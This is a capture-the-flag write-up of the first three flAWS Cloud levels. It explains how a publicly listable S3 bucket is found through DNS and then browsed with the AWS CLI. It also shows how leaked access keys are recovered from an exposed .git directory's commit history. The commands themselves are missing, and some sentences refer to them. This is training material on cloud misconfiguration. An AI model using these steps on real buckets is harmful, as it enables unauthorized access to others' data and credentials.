flAWS Cloud 1
These CTF write-ups contain spoilers
Written: 2021/08/14
These CTF challenges focus on misconfiguration and mistakes associated with using Amazon Web Services (AWS).
Level 1
Challenge notes
This level is buckets of fun. See if you can find the first sub-domain.
For this challenge, we are asked to find the next level’s sub-domain. The clue we get is it will be related to Amazon S3 buckets. Looking at flaws.cloud’s DNS records we can see that the domain is pointed at an IP address (52.218.220.162):
Checking for CNAME records did not reveal anything interesting, but the IP address appears to belong to an S3 bucket. Trying to directly visit this IP address in the browser redirects us to the Amazon S3 site. Based on the hint about buckets, we we can start exploring the idea that the site may be hosted as a static site within an AWS Bucket. If this is the case, reviewing the Configuring a static website using a custom domain documentation comes to hand. Step 2 indicates the following: These bucket names must match your domain name exactly. Searching around for the domain structure of static sites hosted on AWS S3 buckets, I found this article on hosting a site on an S3 bucket which lead me to thefollowing syntax:
We already know that when hosting a static site, the bucket name will need to match the custom domain. Using the above formula, therefore we can try out the domain flaws.cloud.s3.amazonaws.com. In my experience, Amazon bucket information is displayed as an XML file. Going to the above site, that is exactly that we end up with.
Flag
Following the above link leads us to Level 2. The above link provides some additional information on how to avoid exposing AWS bucket based sites in a similar manner.
Level 2
Challenge Notes
The next level is fairly similar, with a slight twist. You’re going to need your own AWS account for this. You just need the free tier.
This challenge starts off much like the first challenge, however on this occasion we are making use of an AWS account. I suspected this may be to use AWS CLI. This is not something I used a lot, so it was back to digging around documentation. I started to look at the Amazon configuration basics documentation for AWS CLI for an idea. This is where it became apparent why I needed an AWS account in the first place. According to the document using aws configure, we can configure our AWS Access Key ID and AWS Secret Access Key along with a region. This can then be used to connect to buckets. After setting up my own configuration based on the documentation and using my account I tried the syntax suggested.
Flag
Much like the previous level, navigating to the third level gives us insight as to what caused us the ability to list out the content.
Level 3
Challenge notes
The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.
We are still on the s3
command trend and building on our knowledge from the earlire challenge about listing things out. The hint the notes give us is that we are looking for an AWS key and that we are going to try and list out other buckets. Much like in Level 1, we can try to see if the S3 bucket is accessible over the browser by using the bucket URL: level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com.
Visiting this, we find that the bucket’s settings are configured to allow everyone access without the need for keys. Looking through the bucket listing, I noticed that there was a .git
directory:
This is extremely useful as it may contain our key, alternatively we can explore the commit history to see if previously a key has been committed. In order to download the content of the .git
directory so we can use git
locally to browse through the content, I found an article How to copy folder from s3 using aws cli that was very helpful.
Running the above syncs the .git
directory found on the Level 3 bucket. We can then start to explore the repo. I first searched through the commit history using git log
:
Looks like right after our first commit, another one was made, noting that something was accidentally added that should not have been added. We can now focus on seeing what was committed on the first commit:
By stepping through the git cat-file
command, we are able to gather up the access_key
and secret_access_key
. The hint from the challenge notes indicate we may be able to list out other buckets using these keys. Following the steps to create a new profile, I created one using these keys.
I found that you can list the s3
buckets your keys have access to over AWS CLI using the list-buckets command.